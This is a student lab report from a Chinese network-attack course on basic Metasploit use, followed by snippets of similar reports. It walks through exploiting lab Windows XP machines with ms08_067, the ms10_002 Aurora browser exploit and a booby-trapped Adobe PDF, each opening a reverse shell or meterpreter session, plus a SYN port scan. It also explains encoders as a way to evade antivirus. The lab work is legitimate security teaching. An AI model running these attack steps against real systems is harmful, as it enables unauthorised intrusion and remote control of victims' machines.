20155217《网络对抗》Exp05 MSF基础应用

20155217《网络对抗》Exp05 MSF基础应用

实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,如ms08_067;
  • 一个针对浏览器的攻击,如ms11_050;
  • 一个针对客户端的攻击,如Adobe;
  • 成功应用任何一个辅助模块。

主动攻击:ms08_067

  • 先用search ms08_067查询针对该漏洞的攻击模块:

  • use exploit/windows/smb/ms08_067_netapi使用该模块
  • 输入命令show payloads会显示出有效的攻击载荷:

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷
  • 输入命令set LHOST 192.168.152.130, set RHOST 192.168.152.131
  • 使用命令show options查看payload状态:

  • 输入命令exploit开始攻击,攻击成功(若攻击失败,则需要关闭XP的防火墙):

  • 在kali上执行ipconfig/all

  • 在win xp上执行ipconfig/all:

  • 发现二者结果相同,说明成功攻击。

对浏览器攻击:MS10-002漏洞攻击

  • 先利用search ms10_002指令查看可以运用的攻击模块。

  • 使用use windows/browser/ms10_002_aurora模块。
  • info查看该模块的信息:

  • set payload windows/meterpreter/reverse_tcp设置payload,并设置需要设置的参数。
  • show options确认需要设置的参数是否已经设置好:

  • 确认参数设置无误后,用exploit指令开始攻击,攻击成功后会有靶机需要访问的网址:

  • 在靶机IE上输入该网址,此时kali中可以看到有目标主机上线,会话建立。

  • 输入sessions -i 1,成功获取靶机的shell,可以对其进行操作:

针对客户端的攻击:adobe_toolbutton

  • 输入use exploit/windows/fileformat/adobe_cooltype_sing进入模块。
  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷,并设置相关数据:

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里:

  • 使用use exploit/multi/handler新建监听模块:

  • 输入sysinfo,攻击成功:

成功应用任何一个辅助模块成功应用任何一个辅助模块

  • show auxiliary查看所有辅助模块,并从中选择一个。我使用的是scanner/portscan/syn。它是通过发送TCP SYN标志的方式来探测开放的端口。
  • show options查看配置,并进行相关配置:

  • 配置完成后,run,发现扫描开放端口成功:

基础问题回答

  • 用自己的话解释什么是exploit,payload,encode。
  1. exploit是背着payload去攻击,起到运载作用。
  2. payload则为攻击负荷。
  3. encode为编码器,使其得到伪装,防止被查杀,打掩护用到的。

离实战还缺些什么技术或步骤?

实战的话还需要结合靶机的环境去考虑。

实践总结与体会

这次实验再次能够看出msf是一个比较全面的工具,但渗透的局限性也比较明显。由于前几天在准备考试,这次实验完成得比较晚,但在其他同学的帮助下完成速度还是比较快的,毕竟比他们少走了很多弯路。而且这次又从其他角度成功地进行了攻击,学习到了不少新的东西,美滋滋:D。

原文地址:https://www.cnblogs.com/yangdi0420/p/8947413.html

时间: 2024-09-29 16:50:07

20155217《网络对抗》Exp05 MSF基础应用的相关文章

20145326蔡馨熤《网络对抗》——MSF基础应用

20145326蔡馨熤<网络对抗>--MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机. payload:其实就是指装载的"具体内容".就相当于shellcode一样. encode:对需要传输的文件进行编码,使其达到免杀效果. 实验总结与体会 通过这次MSF基础应用的实验.我对MSF里面包括的6个模块都有了一定的认识,先是exploit模块,也就是我们说的渗透模块,包括主

20145318《网络对抗》MSF基础应用

20145318 <网络对抗> MSF基础应用 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050:(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块 基础问题回答 exploit:通过漏洞对程序攻击的途径,是一种手段或通道. payload:具体的攻击代码 encode:伪装.隐藏 实践过程 主动攻击:ms08_067 针对浏览器:ms11_05

20145216史婧瑶 《网络对抗》 MSF基础应用

20145216史婧瑶 <网络对抗> MSF基础应用 实验回答问题 用自己的话解释什么是exploit,payload,encode. exploit:渗透攻击模块,测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果. payload:攻击载荷模块,由一些可动态运行在远程主机上的代码组成 encode:编码器模块,对指令重新进行编码,用以实现反检测功能.指令顺利执行等 实践过程 主动攻击(ms08_067漏洞) MS08_067远程漏洞攻击实践:Shell 1.在VMware

20155305《网络对抗》MSF基础应用

20155305<网络对抗>MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多. Kali IP地址:192.168.1.105 1.主动攻击:ms08_067 使用靶机1和Kali 先msfconsole

2018-2019 20165235 网络对抗 Exp5 MSF基础

2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.168.21.128 永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue.并且通过show payloads 显示可用攻击载荷.

2018-2019 20165221 网络对抗 Exp5 MSF基础

2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 具体实验操作 攻击机(kali):192.168.194.128 靶机(win7):192.168.194.129 任务一:主动攻击实践 W

20145322 《网络对抗》 MSF基础应用1

20145322何志威 Exp5 MS08_067漏洞测试 实验问答 什么是exploit.payload.encode exploit:通过一个漏洞对程序进行攻击的过程 payload:有具体功能作用的代码 encode:对payload进行伪装 实验链接 实验一MS08_067漏洞测试 实验二MS11_050 实验三Adobe阅读器漏洞攻击 实验四利用nmap扫描

20145321 《网络对抗》 Web基础

20145321 <网络对抗> Web基础 基础问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能,一个表单有三个基本组成部分:表单标签--这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法:表单域--包含了文本框.密码框.隐藏域.多行文本框.复选框.单选框.下拉选择框和文件上传框等:表单按钮:包括提交按钮.复位按钮和一般按钮. (2)浏览器可以解析运行什么语言. HTML语言.XML语言.脚本语言(Java.PHP.Script.JavaScript-) (3

20145326蔡馨熤《网络对抗》—— Web基础

20145326蔡馨熤<网络对抗>-- Web基础 1.实验后回答问题 (1)什么是表单. 表单是一个包含表单元素的区域,表单元素是允许用户在表单中输入信息的元素,表单在网页中主要负责数据采集功能,一个表单有三个基本组成部分:表单标签.表单域.表单按钮. (2)浏览器可以解析运行什么语言. HTML(超文本标记语言) XML(可扩展标记语言) ASP.Python.PHP.JavaScript等众多脚本语言. (3)WebServer支持哪些动态语言. JavaScript.ASP.PHP.R